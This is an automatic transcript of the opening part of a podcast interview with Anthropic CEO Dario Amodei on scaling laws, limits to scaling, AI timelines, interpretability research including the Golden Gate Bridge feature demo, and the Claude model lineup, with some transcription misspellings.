back to index

Dario Amodei: Anthropic CEO on Claude, AGI & the Future of AI & Humanity | Lex Fridman Podcast #452


Chapters

0:0 Introduction
3:14 Scaling laws
12:20 Limits of LLM scaling
20:45 Competition with OpenAI, Google, xAI, Meta
26:8 Claude
29:44 Opus 3.5
34:30 Sonnet 3.5
37:50 Claude 4.0
42:2 Criticism of Claude
54:49 AI Safety Levels
65:37 ASL-3 and ASL-4
69:40 Computer use
79:35 Government regulation of AI
98:24 Hiring a great team
107:14 Post-training
112:39 Constitutional AI
118:5 Machines of Loving Grace
137:11 AGI timeline
149:46 Programming
156:46 Meaning of life
162:53 Amanda Askell - Philosophy
165:21 Programming advice for non-technical people
169:9 Talking to Claude
185:41 Prompt engineering
194:15 Post-training
198:54 Constitutional AI
203:48 System prompts
209:54 Is Claude getting dumber?
221:56 Character training
222:56 Nature of truth
227:32 Optimal rate of failure
234:43 AI consciousness
249:14 AGI
257:52 Chris Olah - Mechanistic Interpretability
262:44 Features, Circuits, Universality
280:17 Superposition
291:16 Monosemanticity
298:8 Scaling Monosemanticity
306:56 Macroscopic behavior of neural networks
311:50 Beauty of neural networks

Whisper Transcript | Transcript Only Page

00:00:00.000 | If you extrapolate the curves that we've had so far, right?
00:00:03.080 | If, if you say, well, I don't know, we're starting to get to like PhD level.
00:00:07.360 | And last year we were at undergraduate level and the year before we were at
00:00:11.340 | like the level of a high school student, again, you can, you can quibble with
00:00:14.980 | at what tasks and for what we're still missing modalities, but those are being
00:00:19.140 | added, like computer use was added, like image generation has been added.
00:00:22.680 | If you just kind of like eyeball the rate at which these capabilities are
00:00:26.280 | increasing, it does make you think that we'll get there by 2026 or 2027.
00:00:31.640 | I think there are still worlds where it doesn't happen in, in a hundred years.
00:00:34.920 | Those were the number of those worlds is rapidly decreasing.
00:00:38.520 | We are rapidly running out of truly convincing blockers, truly compelling
00:00:43.500 | reasons why this will not happen in the next few years, the scale up is very quick.
00:00:47.500 | Like we do this today, we make a model and then we deploy thousands, maybe
00:00:51.720 | tens of thousands of instances of it.
00:00:53.960 | I think by the time, you know, certainly within two to three years, whether we
00:00:57.640 | have these super powerful AIs or not, clusters are going to get to the size
00:01:01.240 | where you'll be able to deploy millions of these, I am optimistic about meaning.
00:01:05.660 | I worry about economics and the concentration of power.
00:01:10.420 | That's actually what I worry about more.
00:01:12.000 | The abuse of power and AI increases the amount of power in the world.
00:01:18.280 | And if you concentrate that power and abuse that power,
00:01:21.040 | it can do immeasurable damage.
00:01:23.040 | It's very frightening.
00:01:24.240 | It's very, it's very frightening.
00:01:25.440 | The following is a conversation with Dario Amadei, CEO of Anthropic, the
00:01:33.200 | company that created Claude, that is currently and often at the top of
00:01:37.360 | most LLM benchmark leaderboards.
00:01:39.500 | On top of that, Dario and the Anthropic team have been outspoken advocates for
00:01:44.860 | taking the topic of AI safety very seriously, and they have continued to
00:01:49.880 | publish a lot of fascinating AI research on this and other topics.
00:01:54.960 | I'm also joined afterwards by two other brilliant people from Anthropic.
00:02:00.320 | First, Amanda Askel, who is a researcher working on alignment and fine-tuning
00:02:06.680 | of Claude, including the design of Claude's character and personality.
00:02:11.000 | A few folks told me she has probably talked with Claude more
00:02:15.400 | than any human at Anthropic.
00:02:18.240 | So she was definitely a fascinating person to talk to about prompt
00:02:22.280 | engineering and practical advice on how to get the best out of Claude.
00:02:26.440 | After that, Chris Ola stopped by for a chat.
00:02:30.440 | He's one of the pioneers of the field of mechanistic interpretability, which
00:02:36.000 | is an exciting set of efforts that aims to reverse engineer neural networks to
00:02:41.000 | figure out what's going on inside, inferring behaviors from neural activation
00:02:46.600 | patterns inside the network.
00:02:48.760 | This is a very promising approach for keeping future
00:02:52.560 | super-intelligent AI systems safe.
00:02:54.720 | For example, by detecting from the activations when the model is trying
00:02:59.480 | to deceive the human it is talking to.
00:03:02.400 | This is the Lex Friedman Podcast.
00:03:05.360 | To support it, please check out our sponsors in the description.
00:03:08.520 | And now, dear friends, here's Dario Amadei.
00:03:12.960 | Let's start with the big idea of scaling laws and the scaling hypothesis.
00:03:17.760 | What is it, what is its history, and where do we stand today?
00:03:21.360 | So I can only describe it as it, you know, as it relates to kind of my own
00:03:25.960 | experience, but I've been in the AI field for about 10 years, and it was
00:03:30.440 | something I noticed very early on.
00:03:32.160 | So I first joined the AI world when I was working at Baidu with Andrew Ng in
00:03:36.840 | late 2014, which is almost exactly 10 years ago now, and the first thing we
00:03:42.400 | worked on was speech recognition systems.
00:03:45.000 | And in those days, I think deep learning was a new thing.
00:03:47.840 | It had made lots of progress, but everyone was always saying, we don't
00:03:51.520 | have the algorithms, we need to succeed.
00:03:53.360 | You know, we're not, we're only matching a tiny, tiny fraction.
00:03:57.960 | There's so much we need to kind of discover algorithmically.
00:04:01.160 | We haven't found the picture of how to match the human brain.
00:04:04.000 | And when, you know, in some ways it was fortunate.
00:04:08.560 | I was kind of, you know, you can have almost beginner's luck, right?
00:04:11.040 | I was like a newcomer to the field.
00:04:13.360 | And, you know, I looked at the neural net that we were using for speech,
00:04:16.360 | the recurrent neural networks, and I said, I don't know, what if you make
00:04:19.480 | them bigger and give them more layers?
00:04:21.120 | And what if you scale up the data along with this, right?
00:04:23.560 | I just saw these as, as like independent dials that you could turn.
00:04:27.280 | And I noticed that the model started to do better and better as you gave them
00:04:31.200 | more data, as you, as you made the models larger, as you trained them for longer.
00:04:35.880 | And I didn't measure things precisely in those days, but, but along
00:04:40.800 | with, with colleagues, we very much got the informal sense that the more
00:04:45.120 | data and the more compute and the more training you put into these
00:04:48.960 | models, the better they perform.
00:04:51.000 | And so initially my thinking was, Hey, maybe that is just true for
00:04:55.400 | speech recognition systems, right?
00:04:56.960 | Maybe, maybe that's just one particular quirk, one particular area.
00:05:00.840 | I think it wasn't until 2017 when I first saw the results from GPT-1 that it
00:05:07.600 | clicked for me that language is probably the area in which we can do this.
00:05:11.480 | We can get trillions of words of language data.
00:05:15.240 | We can train on them.
00:05:16.560 | And the models we were trained in those days were tiny.
00:05:19.280 | You could train them on one to eight GPUs.
00:05:22.080 | Whereas, you know, now we train jobs on tens of thousands, soon
00:05:25.240 | going to hundreds of thousands of GPUs.
00:05:27.360 | And so when I, when I saw those two things together and, you know, there
00:05:31.720 | were a few people like Ilya Sutskever, who, who you've interviewed, who
00:05:34.880 | had somewhat similar views, right?
00:05:36.760 | He might've been the first one, although I think a few people came to, came to
00:05:40.680 | similar views around the same time, right?
00:05:42.440 | There was, you know, Rich Sutton's bitter lesson, there was Gorin wrote
00:05:46.120 | about the scaling hypothesis, but I think somewhere between 2014 and 2017 was when
00:05:52.840 | it really clicked for me when I really got conviction that, Hey, we're going to
00:05:56.400 | be able to do these incredibly wide cognitive tasks if we just, if we just
00:06:01.720 | scale up the models and at, at every stage of scaling, there are always
00:06:06.280 | arguments and, you know, when I first heard them, honestly, I thought probably
00:06:09.960 | I'm the one who's wrong.
00:06:10.920 | And, you know, all these, all these experts in the field are right.
00:06:13.200 | They know the situation better, better than I do.
00:06:15.560 | Right.
00:06:15.840 | There's, you know, the Chomsky argument about like, you can get
00:06:18.840 | syntactics, but you can't get semantics.
00:06:21.120 | There was this idea, Oh, you can make a sentence make sense, but you
00:06:23.680 | can't make a paragraph make sense.
00:06:25.440 | The latest one we have today is.
00:06:27.600 | Uh, you know, we're going to run out of data or the data isn't high
00:06:31.080 | quality enough or models can't reason.
00:06:33.920 | And, and each time, every time we managed to, we managed to either find a way
00:06:38.160 | around or scaling just is the way around.
00:06:40.400 | Um, sometimes it's one, sometimes it's the other.
00:06:43.160 | Uh, and, and so I'm now at this point, I, I still think, you know, it's, it's,
00:06:47.720 | it's always quite uncertain.
00:06:49.080 | We have nothing but inductive inference to tell us that the next few years are
00:06:53.280 | going to be like the next, the last 10 years, but, but I've seen, I've seen the
00:06:57.640 | movie enough times I've seen the story happen for, for enough times to really
00:07:02.160 | believe that probably the scaling is going to continue and that there's
00:07:05.880 | some magic to it that we haven't really explained on a theoretical basis yet.
00:07:10.160 | And of course the scaling here is.
00:07:12.160 | Bigger networks, bigger data, bigger compute.
00:07:16.920 | All of those in particular, linear scaling up of bigger networks, bigger
00:07:22.880 | training times, and, uh, more and more data.
00:07:26.760 | Uh, so all of these things, almost like a chemical reaction, you know, you have
00:07:30.240 | three ingredients in the chemical reaction and you need to linearly
00:07:33.600 | scale up the three ingredients.
00:07:34.760 | If you scale up one, not the others, you run out of the other
00:07:37.760 | reagents and the, and the reaction stops.
00:07:39.800 | But if you scale up everything, everything in series, then,
00:07:43.560 | then the reaction can proceed.
00:07:44.960 | And of course, now that you have this kind of empirical science slash art,
00:07:48.880 | you can apply it to other, uh, more nuanced things like scaling laws applied
00:07:54.880 | to interpretability or scaling laws applied to post-training or just seeing
00:07:59.760 | how does this thing scale, but the big scaling law, I guess the underlying
00:08:04.040 | scaling hypothesis has to do with big networks, big data leads to intelligence.
00:08:09.200 | Yeah, we've, we've documented scaling laws in lots of domains
00:08:13.320 | other than language, right?
00:08:15.040 | So, uh, initially the, the paper we did that first showed it was in early 2020
00:08:20.120 | where we first showed it for language.
00:08:21.760 | There was then some work late in 2020 where we showed the same thing for
00:08:26.560 | other modalities like images, video, text to image, image to text, math,
00:08:33.080 | that they all had the same pattern.
00:08:34.640 | And, and you're right now, there are other stages like post-training or there
00:08:38.480 | are new types of reasoning models.
00:08:40.280 | And in, in, in all of those cases that we've measured, we see similar,
00:08:45.600 | similar types of scaling laws.
00:08:47.200 | A bit of a philosophical question, but what's your intuition about why
00:08:52.080 | bigger is better in terms of network size and data size?
00:08:56.040 | Why does it lead to more intelligent models?
00:08:59.840 | So in my previous career as a, as a biophysicist, so I did physics
00:09:03.680 | undergrad and then biophysics in, in, in, in grad school.
00:09:07.040 | So I think back to what I know as a physicist, which is actually much less
00:09:10.400 | than what some of my colleagues at Anthropic have in terms of, in terms
00:09:14.280 | of expertise in physics, uh, there's this, there's this concept called the
00:09:18.960 | one over F noise and one over X distributions, um, where, where often,
00:09:24.400 | um, uh, you know, just, just like if you add up a bunch of natural
00:09:28.120 | processes, you get a Gaussian.
00:09:29.840 | If you add up a bunch of kind of differently distributed natural
00:09:34.240 | processes, if you like, if you like, take a, take a, um, probe
00:09:38.160 | and, and hook it up to a resistor.
00:09:39.800 | The distribution of the thermal noise and the resistor goes
00:09:43.680 | as one over the frequency.
00:09:44.960 | Um, it's some kind of natural convergent distribution.
00:09:47.920 | Uh, and, and I, I, I, and, and I think what it amounts to is that if you look
00:09:53.280 | at a lot of things that are, that are produced by some natural process that
00:09:57.480 | has a lot of different scales, right.
00:09:59.240 | Not a Gaussian, which is kind of narrowly distributed, but, you know,
00:10:02.760 | if I look at kind of like large and small fluctuations that lead to lead
00:10:07.680 | to electrical noise, um, they have this decaying one over X distribution.
00:10:12.960 | And so now I think of like patterns in the physical world, right.
00:10:16.560 | If I, if, or, or in language, if I think about the patterns in language,
00:10:20.520 | there are some really simple patterns.
00:10:22.240 | Some words are much more common than others like the, then there's
00:10:25.640 | basic noun, verb structure.
00:10:27.560 | Then there's the fact that, you know, nouns and verbs have to agree.
00:10:30.880 | They have to coordinate and there's the higher level sentence structure.
00:10:33.960 | Then there's the thematic structure of paragraphs.
00:10:36.280 | And so the fact that there's this regressing structure, you can imagine
00:10:40.480 | that as you make the networks larger, first, they capture the really simple
00:10:44.880 | correlations, the really simple patterns.
00:10:46.800 | And there's this long tail of other patterns.
00:10:49.560 | And if that long tail of other patterns is really smooth, like it is with the
00:10:54.080 | one over F noise in, you know, physical processes, like, like, like, like
00:10:58.000 | resistors, then you can imagine as you make the network larger, it's kind of
00:11:02.040 | capturing more and more of that distribution.
00:11:04.480 | And so that smoothness gets reflected in how well the models are at
00:11:08.600 | predicting that how well they perform.
00:11:10.160 | Language is an evolved process, right?
00:11:13.560 | We've, we've developed language.
00:11:15.160 | We have common words and less common words.
00:11:18.000 | We have common expressions and less common expressions.
00:11:20.760 | We have ideas, cliches that are expressed frequently, and we have novel ideas.
00:11:25.800 | And that process has, has developed, has evolved with
00:11:29.000 | humans over millions of years.
00:11:30.920 | And so the, the, the guess, and this is pure speculation would be, would be
00:11:35.360 | that there is, there's some kind of long tail distribution of, of, of
00:11:39.920 | the distribution of these ideas.
00:11:41.520 | So there's the long tail, but also there's the height of the hierarchy
00:11:45.200 | of concepts that you're building up.
00:11:47.120 | So the bigger the network, presumably you have a higher capacity to.
00:11:50.520 | Exactly.
00:11:51.000 | If you have a small network, you only get the common stuff, right?
00:11:53.880 | If, if I take a tiny neural network, it's very good at understanding that,
00:11:58.040 | you know, a sentence has to have, you know, verb, adjective, noun, right?
00:12:01.440 | But it's, it's terrible at deciding what those verb, adjective, and noun
00:12:05.360 | should be and whether they should make sense.
00:12:06.960 | If I make it just a little bigger, it gets good at that.
00:12:09.640 | Then suddenly it's good at the sentences, but it's not good at the paragraphs.
00:12:12.960 | And so these, these rarer and more complex patterns get picked up as I
00:12:17.320 | add, as I add more capacity to the network.
00:12:19.880 | Well, the natural question then is what's the ceiling of this?
00:12:23.440 | Yeah.
00:12:23.920 | Like how complicated and complex is the real world?
00:12:27.800 | How much stuff is there to learn?
00:12:29.600 | I don't think any of us knows the answer to that question.
00:12:32.320 | Um, I S my strong instinct would be that there's no ceiling
00:12:36.440 | below the level of humans, right?
00:12:37.880 | We humans are able to understand these various patterns.
00:12:40.840 | And so that, that makes me think that if we continue to, you know,
00:12:45.040 | scale up these, these, these models to kind of develop new methods for
00:12:49.800 | training them and scaling them up, uh, that will at least get to the level
00:12:53.600 | that we've gotten to with humans.
00:12:55.240 | There's then a question of, you know, how much more is it possible
00:12:58.720 | to understand that humans do?
00:13:00.040 | How much, how much is it possible to be smarter and more perceptive than humans?
00:13:04.400 | I would guess the answer has, has got to be domain dependent.
00:13:09.520 | If I look at an area like biology and, you know, I wrote this essay,
00:13:13.400 | machines of loving grace, it seems to me that humans are struggling to
00:13:18.480 | understand the complexity of biology, right?
00:13:20.480 | If you go to Stanford or to Harvard or to Berkeley, you have whole departments
00:13:25.800 | of, you know, folks trying to study, you know, like the immune
00:13:29.120 | system or metabolic pathways.
00:13:31.200 | And, and each person understands only a tiny bit, part of it specializes.
00:13:36.480 | And they're struggling to combine their knowledge with that of,
00:13:39.280 | with that of other humans.
00:13:40.400 | And so I have an instinct that there's, there's a lot of room at
00:13:43.240 | the top for AI's to get smarter.
00:13:45.560 | If I think of something like materials in the, in the physical world, or, you
00:13:51.160 | know, um, like addressing, you know, conflicts between humans or something
00:13:55.200 | like that, I mean, you know, it may be, there's only some of these problems
00:13:58.600 | are not intractable, but much harder.
00:14:00.720 | And, and it may be that there's only, there's only so well you can
00:14:04.760 | do at some of these things, right?
00:14:06.040 | Just like with speech recognition.
00:14:07.280 | There's only so clear I can hear your speech.
00:14:09.760 | So I think in some areas there may be ceilings in, in, in, you know, that
00:14:14.440 | are very close to what humans have done in other areas, those
00:14:17.240 | ceilings may be very far away.
00:14:18.800 | And I think we'll only find out when we build these systems.
00:14:21.680 | Uh, there's, it's very hard to know in advance.
00:14:23.880 | We can speculate, but we can't be sure.
00:14:25.440 | And in some domains, the ceiling might have to do with human bureaucracies
00:14:29.720 | and things like this, as you write about.
00:14:31.160 | Yeah.
00:14:31.520 | So humans fundamentally have to be part of the loop.
00:14:34.720 | That's the cause of the ceiling, not maybe the limits of the intelligence.
00:14:38.160 | Yeah.
00:14:38.480 | I think in many cases, um, you know, in theory, technology
00:14:43.360 | could change very fast.
00:14:44.840 | For example, all the things that we might invent with respect to biology.
00:14:49.080 | Um, but remember there's, there's a, you know, there's a clinical trial
00:14:52.640 | system that we have to go through to actually administer these things to humans.
00:14:56.840 | I think that's a mixture of things that are unnecessary and bureaucratic
00:15:01.000 | and things that kind of protect the integrity of society.
00:15:04.160 | And the whole challenge is that it's hard to tell.
00:15:06.120 | It's hard to tell what's going on.
00:15:07.640 | Uh, it's hard to tell which is which right.
00:15:09.200 | My, my view is definitely, I think in terms of drug development, we, my view
00:15:14.480 | is that we're too slow and we're too conservative, but certainly if you get
00:15:18.120 | these things wrong, you know, it's, it's possible to, to, to risk people's
00:15:21.720 | lives by, by being, by being, by being too reckless.
00:15:24.760 | And so at least, at least some of these human institutions
00:15:27.880 | are in fact protecting people.
00:15:30.040 | So it's, it's all about finding the balance.
00:15:32.480 | I strongly suspect that balance is kind of more on the side of pushing to make
00:15:36.680 | things happen faster, but there is a balance.
00:15:38.560 | If we do hit a limit, if we do hit a slowdown in the scaling laws, what
00:15:45.000 | do you think would be the reason?
00:15:46.000 | Is it compute limited, data limited?
00:15:48.000 | Uh, is it something else?
00:15:49.520 | Ideal limited?
00:15:50.800 | So a few things now we're talking about hitting the limit before we get to the
00:15:55.040 | level of, of humans and the skill of humans.
00:15:57.640 | Um, so, so I think one that's, you know, one that's popular today, and I think,
00:16:02.080 | you know, could be a limit that we run into.
00:16:04.320 | I like most of the limits I would bet against it, but it's definitely
00:16:07.320 | possible is we simply run out of data.
00:16:09.520 | There's only so much data on the internet and there's issues with
00:16:12.440 | the quality of the data, right?
00:16:13.800 | You can get hundreds of trillions of words on the internet, but a lot of it
00:16:18.600 | is, is repetitive or it's search engine, you know, search engine optimization
00:16:24.000 | drivel, or maybe in the future it'll even be text generated by AIs itself.
00:16:28.000 | Uh, and, and so I think there are limits to what, to, to, to what can be produced
00:16:33.760 | in this way that said we, and I would guess other companies are working on
00:16:38.720 | ways to make data synthetic, uh, where you can, you know, you can use the model
00:16:43.640 | to generate more data of the type that you have that you have already, or
00:16:47.720 | even generate data from scratch.
00:16:49.760 | If you think about, uh, what was done with, uh, DeepMinds AlphaGo Zero, they
00:16:54.200 | managed to get a bot all the way from, you know, no ability to play Go whatsoever
00:16:59.000 | to above human level, just by playing against itself, there was no example
00:17:02.960 | data from humans required in the, the AlphaGo Zero version of it.
00:17:07.120 | The other direction of course, is these reasoning models that do chain of
00:17:10.680 | thought and stop to think, um, and, and reflect on their own thinking in a way.
00:17:14.800 | That's another kind of synthetic data coupled with reinforcement learning.
00:17:19.080 | So my, my guess is with one of those methods, we'll get around the data
00:17:22.640 | limitation, or there may be other sources of data that are, that are available.
00:17:26.440 | Um, we could just observe that even if there's no problem with data, as
00:17:31.080 | we start to scale models up, they just stop getting better.
00:17:33.840 | It's, it seemed to be a reliable observation that they've gotten better.
00:17:38.080 | That could just stop at some point for a reason we don't understand.
00:17:41.640 | Um, the answer could be that we need to, uh, you know, we need
00:17:46.920 | to invent some new architecture.
00:17:49.040 | Um, it's been, there have been problems in the past with, with say, numerical
00:17:53.760 | stability of models where it looked like things were, were leveling off, but,
00:17:57.640 | but actually, you know, when we, when we, when we found the right unblocker,
00:18:01.480 | they didn't end up doing so.
00:18:02.680 | So perhaps there's new, some new optimization method or some new,
00:18:07.160 | uh, technique we need to, to unblock things.
00:18:09.720 | I've seen no evidence of that so far, but if things were to, to slow down,
00:18:13.600 | that perhaps could be one reason.
00:18:15.720 | What about the limits of compute, meaning, uh, the expensive nature of
00:18:21.760 | building bigger and bigger data centers?
00:18:23.360 | So right now, I think, uh, you know, most of the frontier model companies
00:18:28.040 | I would guess are operating in, you know, roughly, you know, $1 billion
00:18:32.480 | scale, plus or minus a factor of three, right?
00:18:34.640 | Those are the models that exist now or are being trained now.
00:18:37.640 | Uh, I think next year we're going to go to a few billion and then, uh, 2026,
00:18:43.120 | we may go to, uh, uh, you know, above 10, 10, 10 billion, and probably by
00:18:47.280 | 2027, their ambitions to build a hundred, a hundred billion dollar,
00:18:51.640 | a hundred billion dollar clusters.
00:18:53.240 | And I think all of that actually will happen.
00:18:55.680 | There's a lot of determination to build the compute, to
00:18:58.400 | do it within this country.
00:19:00.000 | Uh, and I would guess that it actually does happen.
00:19:02.560 | Now, if we get to a hundred billion, that's still not enough compute.
00:19:06.400 | That's still not enough scale.
00:19:07.720 | Then either we need even more scale or we need to develop some way of
00:19:12.640 | doing it more efficiently of shifting the curve, um, I think between all of
00:19:16.520 | these, one of the reasons I'm bullish about powerful AI happening so fast
00:19:20.760 | is just that if you extrapolate the next few points on the curve, we're very
00:19:24.920 | quickly getting towards human level ability, right?
00:19:28.080 | Some of the new models that, that we developed, some, some reasoning models
00:19:32.040 | that have come from other companies, they're starting to get to what I would
00:19:35.160 | call the PhD or professional level, right?
00:19:37.720 | If you look at their, their coding ability, um, the latest model we
00:19:41.840 | released, Sonnet 3.5, the new or updated version, it gets something
00:19:47.040 | like 50% on SuiBench and SuiBench is an example of a bunch of professional
00:19:52.120 | real world software engineering tasks.
00:19:54.240 | At the beginning of the year, I think the state of the art was three or 4%.
00:19:59.520 | So in 10 months, we've gone from 3% to 50% on this task.
00:20:04.320 | And I think in another year we'll probably be at 90%.
00:20:07.040 | I mean, I don't know, but might, might even be, might even be less than that.
00:20:11.120 | Uh, we've seen similar things in graduate level, math, physics, and
00:20:15.560 | biology from models like OpenAI's O1.
00:20:18.360 | Uh, so, uh, if we, if we just continue to extrapolate this right, in terms of
00:20:23.800 | skill, skill that we have, I think if we extrapolate the straight curve within a
00:20:28.760 | few years, we will get to these models being, you know, above the, the highest
00:20:33.320 | professional level in terms of humans.
00:20:34.960 | Now, will that curve continue?
00:20:36.240 | You've pointed to, and I've pointed to a lot of reasons why, you know, possible
00:20:40.360 | reasons why that might not happen, but if the, if the extrapolation curve
00:20:43.960 | continues, that is the trajectory we're on.
00:20:45.680 | So Anthropic has several competitors.
00:20:48.840 | It'd be interesting to get your sort of view of it all.
00:20:51.080 | OpenAI, Google, XAI, Meta.
00:20:53.200 | What does it take to win in the broad sense of win in the space?
00:20:57.880 | Yeah.
00:20:58.600 | So I want to separate out a couple of things, right?
00:21:01.000 | So, you know, Anthropic's, Anthropic's mission is to kind of
00:21:04.480 | try to make this all go well.
00:21:06.320 | Right.
00:21:06.760 | And, and, you know, we have a theory of change called race to the top, right?
00:21:11.480 | Race to the top is about trying to push the other players to do the
00:21:17.320 | right thing by setting an example.
00:21:19.160 | It's not about being the good guy.
00:21:20.600 | It's about setting things up so that all of us can be the good guy.
00:21:23.600 | I'll give a few examples of this.
00:21:25.480 | Early in the history of Anthropic, one of our co-founders, Chris Ola, who I
00:21:29.280 | believe you're, you're interviewing soon, you know, he's the co-founder of the
00:21:32.800 | field of mechanistic interpretability, which is an attempt to understand
00:21:36.280 | what's going on inside AI models.
00:21:38.520 | So we had him and one of our early teams focus on this area of interpretability,
00:21:44.520 | which we think is good for making models safe and transparent.
00:21:48.160 | For three or four years, that had no commercial application whatsoever.
00:21:52.600 | It still doesn't today.
00:21:53.800 | We're doing some early betas with it and probably it will eventually, but, you
00:21:58.200 | know, this is a very, very long research bet and one in which we've, we've built
00:22:02.880 | in public and shared our results publicly.
00:22:05.160 | And, and we did this because, you know, we think it's a way to make models safer.
00:22:09.160 | An interesting thing is that as we've done this, other companies
00:22:13.240 | have started doing it as well.
00:22:14.640 | In some cases, because they've been inspired by it, in some cases, because
00:22:18.720 | they're worried that, uh, you know, if, if other companies are doing this, that
00:22:23.640 | look more responsible, they want to look more responsible too.
00:22:26.840 | No one wants to look like the irresponsible actor.
00:22:29.240 | And, and so they adopt this, they adopt this as well.
00:22:32.520 | When folks come to Anthropic, interpretability is often a draw.
00:22:36.000 | And I tell them the other places you didn't go, tell them why you came here.
00:22:40.080 | Um, and, and then you see soon that there, that there's interpretability
00:22:45.280 | teams else elsewhere as well.
00:22:47.200 | And in a way that takes away our competitive advantage, because it's
00:22:50.280 | like, Oh, now others are doing it as well, but it's good, it's
00:22:54.960 | good for the broader system.
00:22:56.000 | And so we have to invent some new thing that we're doing that
00:22:58.480 | others aren't doing as well.
00:22:59.600 | And the hope is to basically bid up, bid up the importance of, of, of
00:23:05.280 | doing the right thing.
00:23:06.120 | And it's not, it's not about us in particular, right?
00:23:08.320 | It's not about having one particular good guy.
00:23:11.200 | Other companies can do this as well.
00:23:13.240 | If they, if they, if they join the race to do this, that's, that's, you
00:23:16.560 | know, that's the best news ever.
00:23:17.640 | Right.
00:23:17.960 | Um, uh, it's, it's just, it's about kind of shaping the incentives to
00:23:21.800 | point upward instead of shaping the incentives to point, to point downward.
00:23:25.680 | And we should say this example of the field of, uh, mechanistic
00:23:28.280 | interpretability is just a rigorous non hand wavy way of doing AI safety.
00:23:34.320 | Or it's tending that way.
00:23:36.120 | Trying to, I mean, I think we're still early, um, in terms of our
00:23:40.240 | ability to see things, but I've been surprised at how much we've been
00:23:43.880 | able to look inside these systems and understand what we see, right.
00:23:48.200 | Unlike with the scaling laws, where it feels like there's some, you know,
00:23:51.880 | law that's driving these models to perform better on, on the inside.
00:23:56.440 | The models aren't, you know, there's no reason why they should be
00:23:58.920 | designed for us to understand them.
00:24:00.240 | Right.
00:24:00.480 | They're designed to operate.
00:24:01.600 | They're designed to work just like the human brain or human biochemistry.
00:24:05.440 | They're not designed for a human to open up the hatch, look
00:24:08.080 | inside and understand them.
00:24:09.400 | But we have found, and you know, you can talk in much more detail
00:24:12.960 | about this to Chris, that when we open them up, when we do look inside
00:24:16.680 | them, we, we find things that are surprisingly interesting.
00:24:19.920 | And as a side effect, you also get to see the beauty of these models.
00:24:23.000 | You get to explore the sort of, uh, the beautiful nature of large
00:24:26.920 | neural networks through the McInterp kind of methodology.
00:24:29.720 | I'm amazed at how clean it's been.
00:24:31.280 | I'm amazed at things like induction heads.
00:24:34.560 | I'm amazed at things like, uh, you know, that, that we can, you know,
00:24:40.080 | use sparse autoencoders to find these directions within the networks.
00:24:44.160 | Uh, and that the directions correspond to these very clear concepts.
00:24:49.120 | We demonstrated this a bit with the Golden Gate Bridge claud.
00:24:52.040 | So this was an experiment where we found a direction inside one of the
00:24:56.720 | neural networks layers that corresponded to the Golden Gate Bridge.
00:24:59.840 | And we just turned that way up.
00:25:01.360 | And so we, we released this model as a demo.
00:25:04.400 | It was kind of half a joke, uh, for a couple of days.
00:25:07.080 | Uh, but it was, it was illustrative of, of the method we developed.
00:25:10.400 | And, uh, you could, you could take the Golden Gate or you could take the model.
00:25:14.760 | You could ask it about anything, you know, you know, it'd be like, how you
00:25:18.160 | could say, how was your day and anything you asked, because this feature was
00:25:21.320 | activated, it would connect to the Golden Gate Bridge.
00:25:23.200 | So it would say, you know, I'm, I'm, I'm feeling relaxed and expansive, much
00:25:27.840 | like the arches of the Golden Gate Bridge, or, you know, It would masterfully
00:25:31.760 | change topic to the Golden Gate Bridge and integrate it.
00:25:34.760 | There was also a sadness to it, to, to the focus it had on the Golden Gate Bridge.
00:25:38.640 | I think people quickly fell in love with it.
00:25:40.320 | I think so people already miss it because it was taken down, I think after a day.
00:25:45.440 | Somehow these interventions on the model, um, where, where, where, where you kind
00:25:50.440 | of adjust its behavior somehow emotionally made it seem more human than any other
00:25:55.720 | version of the model, strong personality, strong, strong personality.
00:25:59.520 | It has these kind of like obsessive interests.
00:26:02.400 | You know, we can all think of someone who's like obsessed with something.
00:26:05.200 | So it does make it feel somehow a bit more human.
00:26:07.800 | Let's talk about the present.
00:26:09.200 | Let's talk about Claude.
00:26:10.320 | So this year a lot has happened.
00:26:13.240 | In March, Claude III, Opus, Sonnet, Haiku were released.
00:26:17.760 | Then Claude III, V, Sonnet in July with an updated version just now released.
00:26:24.120 | And then also Claude III, V, Haiku was released.
00:26:26.800 | Okay.
00:26:27.560 | Can you explain the difference between Opus, Sonnet and Haiku and how we should
00:26:33.280 | think about the different versions?
00:26:34.400 | Yeah.
00:26:34.800 | So let's go back to March when we first released these three models.
00:26:38.800 | So, you know, our thinking was, you know, different companies produce
00:26:43.120 | kind of large and small models, better and worse models.
00:26:46.560 | We felt that there was demand both for a really powerful model.
00:26:52.200 | Um, you know, when you, that might be a little bit slower that
00:26:54.800 | you'd have to pay more for.
00:26:56.040 | And also for fast, cheap models that are as smart as they can
00:27:01.280 | be for how fast and cheap, right.
00:27:02.880 | Whenever you want to do some kind of like, you know, difficult analysis.
00:27:07.080 | Like if I, you know, I want to write code for instance, or, you know, I
00:27:10.120 | want to, I want to brainstorm ideas, or I want to do creative writing.
00:27:13.480 | I want the really powerful model.
00:27:15.240 | But then there's a lot of practical applications in a business sense where
00:27:19.120 | it's like, I'm interacting with a website.
00:27:21.280 | I, you know, like I'm like doing my taxes or I'm, you know, talking to, uh, you
00:27:26.640 | know, to like a legal advisor and I want to analyze a contract or, you know, we
00:27:30.840 | have plenty of companies that are just like, you know, I, you know, I want to
00:27:33.680 | do autocomplete on my, on my IDE or something.
00:27:37.000 | Uh, and, and for all of those things, you want to act fast and you want
00:27:40.720 | to use the model very broadly.
00:27:42.200 | So we wanted to serve that whole spectrum of needs.
00:27:46.040 | Um, so we ended up with this, uh, you know, this kind of poetry theme.
00:27:49.960 | And so what's a really short poem.
00:27:51.320 | It's a haiku.
00:27:52.080 | And so haiku is the small, fast, cheap model that is, you know, was at the
00:27:57.160 | time was really surprisingly, surprisingly, uh, intelligent for how
00:28:01.000 | fast and cheap it was, uh, sonnet is a, is a medium sized poem, right.
00:28:05.400 | A couple of paragraphs.
00:28:06.400 | And so Sonnet was the middle model.
00:28:08.000 | It is smarter, but also a little bit slower, a little bit more expensive.
00:28:12.120 | And, and Opus like a magnum Opus is a large work.
00:28:15.320 | Uh, Opus was the, the largest smartest model at the time.
00:28:19.400 | Um, so that, that was the original kind of thinking behind it.
00:28:22.960 | Um, and our, our thinking then was, well, each new generation of models
00:28:28.560 | should shift that trade-off curve.
00:28:30.760 | Uh, so when we released Sonnet 3.5, it has the same, roughly the same, you know,
00:28:36.800 | cost and speed as the Sonnet 3 model.
00:28:41.120 | Uh, but, uh, it, it increased its intelligence to the point where it was
00:28:47.240 | smarter than the original Opus 3 model, uh, especially for code, but,
00:28:51.720 | but also just in general.
00:28:53.240 | And so now, you know, we've shown results for a haiku 3.5 and I believe
